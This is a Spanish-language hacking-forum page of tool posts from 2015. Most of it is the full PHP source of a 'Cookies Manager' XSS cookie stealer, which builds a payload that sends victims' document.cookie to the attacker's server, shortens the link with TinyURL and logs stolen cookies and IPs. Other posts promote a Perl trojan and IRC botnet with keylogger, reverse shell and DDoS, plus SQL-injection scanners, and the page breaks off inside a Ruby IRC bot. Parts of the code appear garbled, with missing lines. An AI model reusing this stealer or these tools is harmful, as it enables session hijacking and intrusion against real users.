41
Programación / PHP / [PHP] Cookies Manager 0.6
en: 18 Diciembre 2015, 21:41 pm
Hoy les traigo una version mejorada de este cookie stealer que les permite capturar,guardar y generar cookies para el robo de cookies usando XSS.
Tiene las siguientes opciones :
Cookie Stealer con generador de TinyURL Pueden ver los cookies que les devuelve una pagina Pueden crear cookies con los datos que quieran Panel oculto con login para entrar usen ?poraca para encontrar al login Una imagen :
Los codigos :
index.php
<?php
// Cookies Manager 0.6
// (C) Doddy Hackman 2015
// Login
$username = "admin" ; // Edit
$password = "21232f297a57a5a743894a0e4a801fc3" ; // Edit
//
$index = "imagen.php" ; // Edit
if ( isset ( $_GET [ 'poraca' ] ) ) {
echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Login</title>
<link rel="shortcut icon" href="images/icono.png">
<link href="style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<center><br>
<div class="post">
<h3>Login</h3>
<div class="post_body">
<img src="images/login.jpg" width="562" height="440" />
<br />
<form action="" method=POST>
Username : <input type=text size=30 name=username /><br /><br />
Password : <input type=password size=30 name=password /><br /><br />
<input type=submit name=login style="width: 100px;" value=Login /><br /><br />
</form>
</div>
</div>
</center>
</body>
</html>' ;
if ( isset ( $_POST [ 'login' ] ) ) {
$test_username = $_POST [ 'username' ] ;
$test_password = md5 ( $_POST [ 'password' ] ) ;
if ( $test_username == $username && $test_password == $password ) {
echo "<script>alert('Welcome idiot');</script>" ;
$ruta = "http://" . $_SERVER [ 'HTTP_HOST' ] . dirname ( $_SERVER [ 'PHP_SELF' ] ) . "/" . $index ; echo '<meta http-equiv="refresh" content="0; url=' . htmlentities ( $ruta ) . '" />' ; } else {
echo "<script>alert('Fuck You');</script>" ;
}
}
} else {
echo '<meta http-equiv="refresh" content="0; url=http://www.petardas.com" />' ;
}
// The End ?
?>
imagen.php
<?php
// Cookies Manager 0.6
// (C) Doddy Hackman 2015
// Login
$username = "admin" ; // Edit
$password = "21232f297a57a5a743894a0e4a801fc3" ; // Edit
// DB
$host = "localhost" ; // Edit
$userw = "root" ; // Edit
$passw = "" ; // Edit
$db = "cookies" ; // Edit
// Functions
function hex_encode( $text )
{
return $texto = '%' . substr ( $texto , 0 , strlen ( $texto ) - 1 ) ; }
function parsear_cookie( $leyendo )
{
$contenido = explode ( ";" , $leyendo ) ;
$nombre = "" ;
$valor_cookie = "" ;
$expires = "" ;
$path = "" ;
$domain = "" ;
$secure = "false" ;
$httponly = "false" ;
foreach ( $contenido as $valor ) {
if ( preg_match ( "/expires=(.*)/" , $valor , $regex ) ) { $expires = $regex [ 1 ] ;
}
elseif ( preg_match ( "/path=(.*)/" , $valor , $regex ) ) { $path = $regex [ 1 ] ;
} elseif ( preg_match ( "/domain=(.*)/" , $valor , $regex ) ) { $domain = $regex [ 1 ] ;
} elseif ( preg_match ( "/secure=(.*)/" , $valor , $regex ) ) { $secure = $regex [ 1 ] ;
} elseif ( preg_match ( "/httponly=(.*)/" , $valor , $regex ) ) { $httponly = $regex [ 1 ] ;
}
else {
$nombre = $regex [ 1 ] ;
$valor_cookie = $regex [ 2 ] ;
}
}
}
$nombre ,
$valor_cookie ,
$expires ,
$path ,
$domain ,
$secure ,
$httponly
) ;
}
function ver_cookies_de_pagina( $pagina )
{
$cookies = "" ;
'user_agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0'
)
) ;
foreach ( $http_response_header as $valores ) {
$cookies = $cookies . trim ( $valores ) . "\n " ; }
}
} else {
curl_setopt ( $nave , CURLOPT_USERAGENT
, "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0" ) ;
foreach ( $leyendo as $valores ) {
$cookies = $cookies . trim ( $valores ) . "\n " ; }
}
}
return $cookies ;
}
function toma( $target )
{
$code = "" ;
curl_setopt ( $nave , CURLOPT_USERAGENT
, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0' ) ; } else {
'user_agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0'
)
) ;
}
return $code ;
}
//
if ( isset ( $_GET [ 'id' ] ) ) {
if ( empty ( $_GET [ 'id' ] ) ) { error( ) ;
}
if ( $ip == "::1" ) {
$ip = "127.0.0.1" ;
}
mysql_query ( "INSERT INTO cookies_found(id,fecha,ip,info,cookie) values(NULL,'$dia ','$ip ','$info ','$cookie ')" ) ;
header ( "Location:http://www.google.com.ar" ) ;
}
elseif ( isset ( $_COOKIE [ 'login' ] ) ) {
$user = $plit [ 0 ] ;
$pass = $plit [ 1 ] ;
if ( $user == $username and $pass == $password ) {
echo '
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Cookies Manager 0.6</title>
<link href="style.css" rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="images/icono.png">
</head>
<body>
<center>' ;
echo '<br><img src="images/cookies.png" /><br>' ;
if ( isset ( $_POST [ 'makecookies' ] ) ) {
if ( setcookie ( $_POST [ 'name_cookie' ] , $_POST [ 'value_cookie' ] , time ( ) + 7200 , $_POST [ 'path_cookie' ] , $_POST [ 'domain_cookie' ] ) ) { echo "<script>alert('Cookie maked');</script>" ;
} else {
echo "<script>alert('Error making Cookie');</script>" ;
}
}
$edit_name = "" ;
$edit_value = "" ;
$edit_expire = "" ;
$edit_path = "" ;
$edit_domain = "" ;
$edit_secure = "" ;
$edit_httponline = "" ;
if ( isset ( $_POST [ 'instalar' ] ) ) {
$cookies_found = "create table cookies_found (
id int(10) UNSIGNED NOT NULL AUTO_INCREMENT,
fecha TEXT NOT NULL,
ip TEXT NOT NULL,
info TEXT NOT NULL,
cookie TEXT NOT NULL,
PRIMARY KEY (id));
" ;
echo "<script>alert('Installed');</script>" ;
} else {
echo "<script>alert('Error');</script>" ;
}
}
//
if ( isset ( $_GET [ 'del' ] ) ) { if ( @ mysql_query ( "delete from cookies_found where id='" . $_GET [ 'del' ] . "'" ) ) { echo "<script>alert('Cookie deleted');</script>" ;
} else {
echo "<script>alert('Error');</script>" ;
}
}
}
// Cookies Found
$re = mysql_query ( "select * from cookies_found order by id ASC" ) ; echo '
<div class="post">
<h3>Cookies Found : ' . $con . '</h3>
<div class="post_body"><br>' ;
if ( $con <= 0 ) {
echo '<b>No cookies found</b><br>' ;
} else {
echo '<table>' ;
echo "<td><b>ID</b></td><td><b>Date</b></td><td><b>IP</b></td><td><b>Data</b></td><td><b>Cookie</b></td><td><b>Name</b></td><td><b>Value</b></td><td><b>Option</b></td><tr>" ;
$cookies_view = $ver [ 4 ] ;
list ( $nombre , $valor_cookie , $expires , $path , $domain , $secure , $httponly ) = parsear_cookie
( $cookies_view ) ;
}
echo "</table>" ;
}
echo ' <br></div>
</div>' ;
//
// Form para target
echo '
<div class="post">
<h3>Enter Target</h3>
<div class="post_body"><br>' ;
echo "
<form action='' method=POST>
<b>Link : </b><input type=text size=40 name=target value='http://localhost/dhlabs/xss/index.php?msg='=></td><tr>
<input type=submit name=getcookies style='height: 25px; width: 100px' value='Get Cookies'> <input type=submit name=generateurl style='height: 25px; width: 100px' value=Generate URL></td>
</form>
" ;
echo ' <br></div>
</div>' ;
// URLS
if ( isset ( $_POST [ 'generateurl' ] ) ) {
echo '
<div class="post">
<h3>Console</h3>
<div class="post_body"><br>' ;
echo "<textarea cols=50 name=code readonly>\n " ;
$script = hex_encode( "<script>document.location='http://" . $_SERVER [ 'HTTP_HOST' ] . $_SERVER [ 'PHP_SELF' ] . "?id='+document.cookie;</script>" ) ;
//echo "http://tinyurl.com/api-create.php?url=".$_POST['target'].$script."\n";
$resultado_code = toma( "http://tinyurl.com/api-create.php?url=" . $_POST [ 'target' ] . $script ) ;
echo "\n </textarea></table>" ;
echo ' <br><br></div>
</div>' ;
}
//
// Get Cookies
if ( isset ( $_POST [ 'getcookies' ] ) ) {
echo '
<div class="post">
<h3>Console</h3>
<div class="post_body"><br>' ;
echo "<textarea cols=50 rows=10 name=code readonly>\n " ;
$resultado_code = ver_cookies_de_pagina( $_POST [ 'target' ] ) ;
echo "\n </textarea>" ;
echo ' <br><br></div>
</div>' ;
$leyendo_esto = split ( "\n " , $resultado_code ) ;
list ( $nombre , $valor_cookie , $expires , $path , $domain , $secure , $httponly ) = parsear_cookie
( $leyendo_esto [ 0 ] ) ;
$edit_name = $nombre ;
$edit_value = $valor_cookie ;
$edit_expire = $expires ;
$edit_path = $path ;
$edit_domain = $domain ;
$edit_secure = $secure ;
$edit_httponline = $httponly ;
}
//
// Form para crear cookies
echo '
<div class="post">
<h3>Cookie Maker</h3>
<div class="post_body"><br>' ;
echo "
<form action='' method=POST>
<b>Name : </b><input type=text size=50 name=name_cookie value='$edit_name '><br><br>
<b>Value : </b><input type=text size=50 name=value_cookie value='$edit_value '><br><br>
<b>Expires : </b><input type=text size=50 name=expire_cookie value='$edit_expire '><br><br>
<b>Path : </b><input type=text size=50 name=path_cookie value='$edit_path '><br><br>
<b>Domain : </b><input type=text size=50 name=domain_cookie value='$edit_domain '><br><br>
<b>Secure : </b><input type=text size=50 name=secure_cookie value='$edit_secure '><br><br>
<b>HTTP Online : </b><input type=text size=50 name=httponline_cookie value='$edit_httponline '><br><br>
<input type=submit name=makecookies style='height: 25px; width: 200px' value='Make Cookie'>
</form>" ;
echo ' <br></div>
</div>' ;
} else {
echo '
<div class="post">
<h3>Installer</h3>
<div class="post_body">' ;
echo "
<form action='' method=POST>
<h2>Do you want install Cookies Manager ?</h2><br>
<input type=submit name=instalar value=Install>
</form><br>" ;
echo ' </div>
</div>' ;
}
echo '
<br><h3>(C) Doddy Hackman 2015</h3><br>
</center>
</body>
</html>' ;
} else {
echo "<script>alert('Fuck You');</script>" ;
}
} else {
echo '<meta http-equiv="refresh" content="0; url=http://www.petardas.com" />' ;
}
// The End ?
?>
style.css
/*
==-----------------------------------==
|| Name : DH Theme ||
|| Version : 0.8 ||
|| Author : Doddy H ||
|| Description: Templante ||
|| Date : 14/1/2015 ||
==-----------------------------------==
*/
body {
background : transparent url ( "images/fondo.jpg" ) repeat scroll 0 0 ;
color : gray ;
font-family :helvetica , arial, sans-serif ;
font-size : 14px ;
text-align : center ;
}
a:link {
text-decoration : none ;
color : orange;
}
a:visited {
color : orange;
}
a:hover {
color : orange;
}
td, tr {
border-style : solid ;
border-color : gray ;
border-width : 1px ;
background : black ;
border : solid #222 2px ;
color : gray ;
font-family :helvetica , arial, sans-serif ;
font-size : 14px ;
text-align : center ;
}
textarea {
font : normal 10px Verdana, Arial, Helvetica, sans-serif ;
background-color : black ;
color : gray ;
border : solid #222 2px ;
border-color : gray
}
input {
border-style : solid ;
border-color : gray ;
border-width : 1px ;
background : black ;
border : solid #222 2px ;
color : gray ;
font-family :helvetica , arial, sans-serif ;
font-size : 14px ;
}
.post {
background-color : black ;
color : gray ;
margin-bottom : 10px ;
width : 600px ;
word-wrap: break-word;
}
.post h3 {
background-color : black ;
color : orange;
background-color : #000 ;
border : solid #222 2px ;
-webkit-border-radius: 4px ;
-moz-border-radius: 4px ;
border-radius: 4px ;
padding : 5px 10px ;
}
.post_body {
background-color : black ;
margin : -20px 0 0 0 ;
color : white ;
background-color : #000 ;
border : solid #222 2px ;
-webkit-border-radius: 4px ;
-moz-border-radius: 4px ;
border-radius: 4px ;
padding : 5px 10px ;
}
/* The End ? */
Un video con ejemplo de usos :
VIDEO Si quieren bajar el programa lo pueden hacer de aca :
SourceForge .
Github .
42
Programación / PHP / [PHP] DH Chat 0.5
en: 4 Diciembre 2015, 16:23 pm
Un simple chat que hice en PHP que tiene las siguientes opciones :
Solo permite 10 mensajes por lo que borra por antiguedad Filtra malas palabras Se pueden borrar comentarios desde el administrador Una imagen :
Los codigos :
index.php
<?php
// DH Chat 0.5
// (C) Doddy Hackman 2015
// Login
$username = "admin" ; // Edit
$password = "21232f297a57a5a743894a0e4a801fc3" ; // Edit
//
$index = "admin.php" ; // Edit
if ( isset ( $_GET [ 'poraca' ] ) ) {
echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Login</title>
<link rel="shortcut icon" href="images/icono.png">
<link href="style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<center><br>
<div class="post">
<h3>Login</h3>
<div class="post_body">
<img src="images/login.jpg" width="562" height="440" />
<br />
<form action="" method=POST>
Username : <input type=text size=30 name=username /><br /><br />
Password : <input type=password size=30 name=password /><br /><br />
<input type=submit name=login style="width: 100px;" value=Login /><br /><br />
</form>
</div>
</div>
</center>
</body>
</html>' ;
if ( isset ( $_POST [ 'login' ] ) ) {
$test_username = $_POST [ 'username' ] ;
$test_password = md5 ( $_POST [ 'password' ] ) ;
if ( $test_username == $username && $test_password == $password ) {
echo "<script>alert('Welcome idiot');</script>" ;
$ruta = "http://" . $_SERVER [ 'HTTP_HOST' ] . dirname ( $_SERVER [ 'PHP_SELF' ] ) . "/" . $index ; echo '<meta http-equiv="refresh" content="0; url=' . htmlentities ( $ruta ) . '" />' ; } else {
echo "<script>alert('Fuck You');</script>" ;
}
}
} else {
echo '<meta http-equiv="refresh" content="0; url=http://www.petardas.com" />' ;
}
// The End ?
?>
admin.php
<?php
// DH Chat 0.5
// (C) Doddy Hackman 2015
// Login
$username = "admin" ; // Edit
$password = "21232f297a57a5a743894a0e4a801fc3" ; // Edit
// DB
$host = "localhost" ; // Edit
$userw = "root" ; // Edit
$passw = "" ; // Edit
$db = "chat" ; // Edit
if ( isset ( $_COOKIE [ 'login' ] ) ) {
$user = $plit [ 0 ] ;
$pass = $plit [ 1 ] ;
if ( $user == $username and $pass == $password ) {
echo '
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>DH Chat 0.5</title>
<link rel="shortcut icon" href="images/icono.png">
<link href="style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<center>
' ;
echo ' <br><img src="images/chat.png" /><br>' ;
if ( isset ( $_POST [ 'instalar' ] ) ) {
$todo = "create table mensajes (
id_comentario int(10) UNSIGNED NOT NULL AUTO_INCREMENT,
mensaje TEXT NOT NULL,
apodo VARCHAR(255) NOT NULL,
PRIMARY KEY (id_comentario));
" ;
$todo2 = "create table insultos (
id_insulto int(10) UNSIGNED NOT NULL AUTO_INCREMENT,
mensaje TEXT NOT NULL,
PRIMARY KEY (id_insulto));
" ;
"lammer" ,
"lamer" ,
"maricon" ,
"noob"
) ;
foreach ( $insultos as $con ) {
@ mysql_query ( "INSERT INTO insultos(id_insulto,mensaje)values(NULL,'$con ')" ) ; }
echo "<script>alert('Installed');</script>" ;
echo '<meta http-equiv="refresh" content=0;URL=>' ;
}
} else {
echo "<script>alert('Error');</script>" ;
}
}
//
$re = mysql_query ( "select * from mensajes order by id_comentario ASC" ) ;
if ( isset ( $_GET [ 'id' ] ) ) { if ( @ mysql_query ( "delete from mensajes where id_comentario='" . $_GET [ 'id' ] . "'" ) ) { echo "<script>alert('Comment deleted');</script>" ;
} else {
echo "<script>alert('Error');</script>" ;
}
}
}
$sql = "select id_comentario from mensajes" ;
echo '
<div class="post">
<h3>Comments : ' . $cantidad . '</h3>
<div class="post_body"><br>' ;
if ( $cantidad <= 0 ) {
echo '<b>No entries found</b><br>' ;
} else {
echo "<table>" ;
echo "<td><b>ID</b></td><td><b>Nick</b></td><td><b>Text</b></td><td><b>Option</b></td><tr>" ;
}
echo "</table>" ;
}
echo ' <br></div>
</div>' ;
if ( isset ( $_POST [ 'new_word' ] ) ) { $in = $_POST [ 'word' ] ;
if ( @ mysql_query ( "INSERT INTO insultos(id_insulto,mensaje)values(NULL,'$in ')" ) ) { echo "<script>alert('Word added');</script>" ;
} else {
echo "<script>alert('Error');</script>" ;
}
}
if ( isset ( $_GET [ 'del_word' ] ) ) { if ( @ mysql_query ( "delete from insultos where id_insulto='" . $_GET [ 'del_word' ] . "'" ) ) { echo "<script>alert('Word deleted');</script>" ;
} else {
echo "<script>alert('Error');</script>" ;
}
}
}
echo '
<div class="post">
<h3>Block words</h3>
<div class="post_body"><br>
' ;
echo "
<form action='' method=POST>
<b>Word : </b><input type=text name=word>
<input type=submit name=new_word style='width: 100px;' value=Add>
</form>" ;
echo '
<br>
</div>
</div>
' ;
$sql = "select id_insulto from insultos" ;
echo '
<div class="post">
<h3>Words blocked : ' . $cantidad . '</h3>
<div class="post_body"><br>
' ;
$rea = mysql_query ( "select * from insultos order by id_insulto ASC" ) ;
if ( $cantidad <= 0 ) {
echo '<b>No entries found</b><br>' ;
} else {
echo "<table>" ;
echo "<td>ID</td><td>Word</td><td>Option</td><tr>" ;
}
echo "</table>" ;
}
echo '
<br>
</div>
</div>
' ;
} else {
echo '
<div class="post">
<h3>Installer</h3>
<div class="post_body">' ;
echo "
<form action='' method=POST>
<h2>Do you want install DH Chat 0.5 ?</h2><br>
<input type=submit name=instalar style='width: 100px;' value=Install>
</form><br>" ;
echo ' </div>
</div>' ;
}
echo '
<br><h3>(C) Doddy Hackman 2015</h3><br>
</center>
</body>
</html>' ;
} else {
echo "<script>alert('Fuck You');</script>" ;
}
} else {
echo '<meta http-equiv="refresh" content="0; url=http://www.petardas.com" />' ;
}
// The End ?
?>
style.css
/*
==-----------------------------------==
|| Name : DH Theme ||
|| Version : 0.8 ||
|| Author : Doddy H ||
|| Description: Templante ||
|| Date : 14/1/2015 ||
==-----------------------------------==
*/
body {
background : transparent url ( "images/fondo.jpg" ) repeat scroll 0 0 ;
color : gray ;
font-family :helvetica , arial, sans-serif ;
font-size : 14px ;
text-align : center ;
}
a:link {
text-decoration : none ;
color : orange;
}
a:visited {
color : orange;
}
a:hover {
color : orange;
}
td, tr {
border-style : solid ;
border-color : gray ;
border-width : 1px ;
background : black ;
border : solid #222 2px ;
color : gray ;
font-family :helvetica , arial, sans-serif ;
font-size : 14px ;
text-align : center ;
word-wrap: break-word;
word-break:break- all;
}
input {
border-style : solid ;
border-color : gray ;
border-width : 1px ;
background : black ;
border : solid #222 2px ;
color : gray ;
font-family :helvetica , arial, sans-serif ;
font-size : 14px ;
}
.post {
background-color : black ;
color : gray ;
margin-bottom : 10px ;
width : 600px ;
word-wrap: break-word;
}
.post h3 {
background-color : black ;
color : orange;
background-color : #000 ;
border : solid #222 2px ;
-webkit-border-radius: 4px ;
-moz-border-radius: 4px ;
border-radius: 4px ;
padding : 5px 10px ;
}
.post_body {
background-color : black ;
margin : -20px 0 0 0 ;
color : white ;
background-color : #000 ;
border : solid #222 2px ;
-webkit-border-radius: 4px ;
-moz-border-radius: 4px ;
border-radius: 4px ;
padding : 5px 10px ;
}
/* The End ? */
chat.php
<?php
//DH Chat 0.5
//(C) Doddy Hackman 2015
// DB
$host = "localhost" ; // Edit
$user = "root" ; // Edit
$pass = "" ; // Edit
$db = "chat" ; // Edit
//
echo '<link href="chat.css" rel="stylesheet" type="text/css" />' ;
echo "<table border=0 width='210' style='table-layout: fixed'>" ;
echo "<td><b>DH Chat 0.5</b></td><tr>" ;
$sumo = mysql_query ( "SELECT MAX(id_comentario) FROM mensajes" ) ;
foreach ( $s as $d ) {
$total = $d ;
}
$test = $total - 10 ;
if ( $test <= 0 ) {
} else {
$resto = $test ;
for ( $i = 1 ; $i <= $resto ; $i ++ ) {
@ mysql_query ( "DELETE FROM mensajes where id_comentario='$i '" ) ; }
}
$re = @ mysql_query ( "select * from mensajes order by id_comentario DESC" ) ;
}
echo "<br><br><td><br><b>Comment</b><br><br>
<form action='' method=POST>
Nick : <input type=text name=apodo size=20><br><br>
Text : <input type=text name=msg size=20><br><br>
<input type=submit name=chatentro style='width: 100px;' value=Send>
</form>
<tr>
<td><b>Coded By Doddy H</b></td><tr>
</table>" ;
if ( isset ( $_POST [ 'chatentro' ] ) ) {
$sumo = mysql_query ( "SELECT MAX(id_comentario) FROM mensajes" ) ;
foreach ( $s as $d ) {
$x_id = $d + 1 ;
}
$apodo = substr ( $apodo , 0 , 70 ) ; $mensaje = substr ( $mensaje , 0 , 70 ) ;
}
@ mysql_query ( "INSERT INTO mensajes(id_comentario,apodo,mensaje)values('$x_id ','$apodo ','$mensaje ')" ) ; }
echo '<meta http-equiv="refresh" content=0;URL=>' ;
}
// The End ?
?>
chat.css
/*
==-----------------------------------==
|| Name : DH Theme ||
|| Version : 0.8 ||
|| Author : Doddy H ||
|| Description: Templante ||
|| Date : 14/1/2015 ||
==-----------------------------------==
*/
body {
color : gray ;
font-family :helvetica , arial, sans-serif ;
font-size : 14px ;
text-align : center ;
}
a:link {
text-decoration : none ;
color : orange;
}
a:visited {
color : orange;
}
a:hover {
color : orange;
}
td, tr {
border-style : solid ;
border-color : gray ;
border-width : 1px ;
background : black ;
border : solid #222 2px ;
color : gray ;
font-family :helvetica , arial, sans-serif ;
font-size : 14px ;
text-align : center ;
word-wrap: break-word;
word-break:break- all;
}
input {
border-style : solid ;
border-color : gray ;
border-width : 1px ;
background : black ;
border : solid #222 2px ;
color : gray ;
font-family :helvetica , arial, sans-serif ;
font-size : 14px ;
}
.post {
background-color : black ;
color : gray ;
margin-bottom : 10px ;
width : 600px ;
word-wrap: break-word;
}
.post h3 {
background-color : black ;
color : orange;
background-color : #000 ;
border : solid #222 2px ;
-webkit-border-radius: 4px ;
-moz-border-radius: 4px ;
border-radius: 4px ;
padding : 5px 10px ;
}
.post_body {
background-color : black ;
margin : -20px 0 0 0 ;
color : white ;
background-color : #000 ;
border : solid #222 2px ;
-webkit-border-radius: 4px ;
-moz-border-radius: 4px ;
border-radius: 4px ;
padding : 5px 10px ;
}
/* The End ? */
test.php
<body background="test.jpg">
<?php
include ( "chat.php" ) ;
?>
Si quieren bajar el programa lo pueden hacer de
aca .
Cualquier sugerencia para mejorar este proyecto diganla para mejorar.
Saludos.
43
Programación / PHP / [PHP] DH Scanner 0.9
en: 20 Noviembre 2015, 23:53 pm
Version mejorada de este scanner en PHP hecho para buscar vulnerabilidades webs.
Tiene las siguientes opciones :
Bing Scanner con scanner SQLI incluido SQLI Scanner LFI Scanner Crackear varias hashes MD5 Buscador del panel de administracion Localizador de IP y sus DNS Encoders para base64,HEX y MD5 Una imagen :
Un video con ejemplo de usos :
VIDEO Si quieren bajar el programa lo pueden hacer de aca :
SourceForge .
Github .
45
Programación / Scripting / [Perl] Project HellStorm 1.2
en: 24 Octubre 2015, 03:06 am
Hola hoy les traigo un troyano en Perl que funciona mediante sockets y como IRC Botnet , tiene las siguientes opciones :
[++] Opciones del troyano
Navegador de archivos : borrar,renombrar Da informacion sobre la computadora Abrir y cerrar CD Ocultar y mostrar barra de inicio o iconos del escritorio Hacer hablar a la computadora para que diga lo que queramos Mandar mensajitos Consola de comandos Administracion de procesos ReverseShell Cambiar fondo de escritorio Mover mouse Cargar word para que escriba solo DOS Attack : en el caso de IRC podran hacer un ataque DDOS si tienen varios infectados Keylogger en segundo plano : sube logs y fotos tomadas a un servidor FTP Una imagen :
Si quieren bajar el programa lo pueden hacer de aca :
SourceForge .
Github .
Eso seria todo.
47
Programación / Scripting / [Perl] Project Arsenal X 0.2
en: 9 Octubre 2015, 22:14 pm
Hoy les traigo la nueva version de mi proyecto Arsenal X escrito en Perl , esta basando en el juego HackTheGame , tiene las siguientes opciones :
Gmail Inbox Client Whois Ping Downloader Get IP Locate IP K0bra SQLI Scanner Crackear varios hashes MD5 Buscar panel de administracion Port Scanner Multi Cracker con soporte para FTP,TELNET,POP3 Ejecucion de comandos en la consola Una imagen :
Un video con ejemplos de uso :
VIDEO Si quieren bajar el programa lo pueden hacer de aca :
SourceForge .
Github .
Eso seria todo.
48
Programación / Scripting / [Ruby] ClapTrap IRC Bot 0.5
en: 26 Septiembre 2015, 00:04 am
Traduccion a Ruby de mi bot para IRC llamado ClapTrap.
Tiene las siguiente opciones :
Scanner SQLI Scanner LFI Buscador de panel de administracion Localizador de IP Buscador de DNS Buscador de SQLI y RFI en google Crack para hashes MD5 Cortador de URL usando tinyurl HTTP FingerPrinting Codificador base64,hex y ASCII El codigo :
#!usr/bin/ruby
#Claptrap IRC Bot 0.5
#(C) Doddy Hackman 2015
require "socket"
require "open-uri"
require "net/http"
require "resolv"
require "base64"
require "digest/md5"
$timeout = "1"
# Functions
def head( )
print "\n \n
@@@@ @ @ @@@@@ @@@@@ @@@@@ @ @@@@@ @ @@@@@ @@@@
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @@@@@ @ @@@@@ @ @ @@@@@ @ @@@@@ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @@@@@ @ @ @ @ @@@@@ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@@@@ @@@@@@ @ @ @ @ @ @ @ @ @ @ @ @@@@
\n \n "
end
def copyright( )
print "\n \n -- == (C) Doddy Hackman 2015 == --\n \n "
end
#
# Functions ClapTrap
def get_ip( hostname)
begin
return Resolv.getaddress ( hostname)
rescue
return "Error"
end
end
def toma( web)
begin
return open ( web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0" ) .read
rescue
return "Error"
end
end
def response_code( web)
begin
return Net::HTTP .get_response ( URI ( web) ) .code
rescue
return "404"
end
end
def tomar( web,arg)
begin
headers = { "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0" }
uri = URI ( web)
http = Net::HTTP .new ( uri.host , uri.port )
return http.post ( uri.path ,arg, headers) .body
rescue
return "Error"
end
end
def toma_ssl( web)
uri = URI .parse ( web)
nave = Net::HTTP .new ( uri.host , uri.port )
nave.use_ssl = true
nave.verify_mode = OpenSSL::SSL::VERIFY_NONE
return nave.get ( uri.request_uri ,{ "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0" } ) .body
end
def cortar( pages)
final = ""
finales = [ ]
pages.flatten .each do | page|
if page=~/ ( .* ) =( .* ) /
parte1 = $1
parte2 = $2
final = parte1 + "="
finales.push ( final)
end
end
return finales
end
def google( dork,pages)
links = [ ]
dork = dork.sub ( / / ,"+" )
contador = 0
for i in ( "1" ..pages )
contador+ =10
code = toma_ssl( "https://www.google.com.ar/search?hl=&q=" + dork+ "&start=" + contador.to_s )
paginas = code.scan ( / ( ?< ="r" >< . href =")(.+?)" / )
paginas.flatten .each do | pagina|
partes = pagina
if partes=~/ url\?q=( .* ) & amp;sa/
parte = $1
link = URI ::decode( parte)
links.push ( link)
end
end
end
links = links.uniq
return links
end
def google_recursive( dork,pages)
dork = dork.sub ( / / ,"+" )
contador = 0
guardo = [ ]
for i in ( "1" ..pages )
contador+ =10
url = "https://www.google.com.ar/search?hl=&q=" + dork+ "&start=" + contador.to_s
code = toma_ssl( url)
links = URI ::extract( code)
links.each do | link|
if link=~/ cache:( .* ?) :( .* ?) \+/
link_final = "http://" + $2
link_final = URI ::decode( link_final)
guardo.push ( link_final)
end
end
end
guardo = guardo.uniq
return guardo
end
def bing( dork,pages)
guardo = [ ]
dork = dork.sub ( / / ,"+" )
contador = 0
for i in ( "1" ..pages )
contador+ =10
code = toma( "http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s )
links = code.scan ( /< h2>< a href="(.*?)" h/ )
links.flatten .each do | link|
link_final = URI ::decode( link)
if not link_final=~/ http:\/ \/ 778802 \.r \.msn \.com \//
guardo.push ( link_final)
end
end
links = code.scan ( /< h3>< a href="(.*?)" h/ )
links.flatten .each do | link|
link_final = URI ::decode( link)
if not link_final=~/ http:\/ \/ 778802 \.r \.msn \.com \//
guardo.push ( link_final)
end
end
end
guardo = guardo.uniq
return guardo
end
def bypass( op)
if op=="--"
return "+" ,"--"
elsif op=="/*"
return "/**/" ,"/**/"
elsif op=="%20"
return "%20" ,"%00"
else
return "+" ,"--"
end
end
def decode_hex( text)
text = text.sub ( "0x" ,"" )
return [ text] .pack ( 'H*' )
end
def encode_hex( text)
return "0x" + text.unpack ( 'H*' ) [ 0 ]
end
def httpfinger( page)
respuesta = ""
begin
nave = Net::HTTP .start ( page)
headers = nave.head ( "/" )
headers.each do | name,value|
respuesta = respuesta + "[+] " + name+ " : " + value+ "\n "
end
nave.finish
rescue
respuesta = "Error"
end
return respuesta
end
##
def locateip( target)
resultado = ""
resultado = resultado + "\n [+] Getting IP ...\n "
ip = get_ip( target)
resultado = resultado + "\n [+] IP : " + ip+ "\n "
web = "http://www.melissadata.com/lookups/iplocation.asp"
resultado = resultado + "\n [+] Locating ...\n \n "
code = tomar( web,"ipaddress=" + ip+ "&btn=Submit" )
if code=~/ City< \/ td>< td align=( .* ) >< b> ( .* ) < \/ b>< \/ td>/
resultado = resultado + "[+] City : " + $2+ "\n "
else
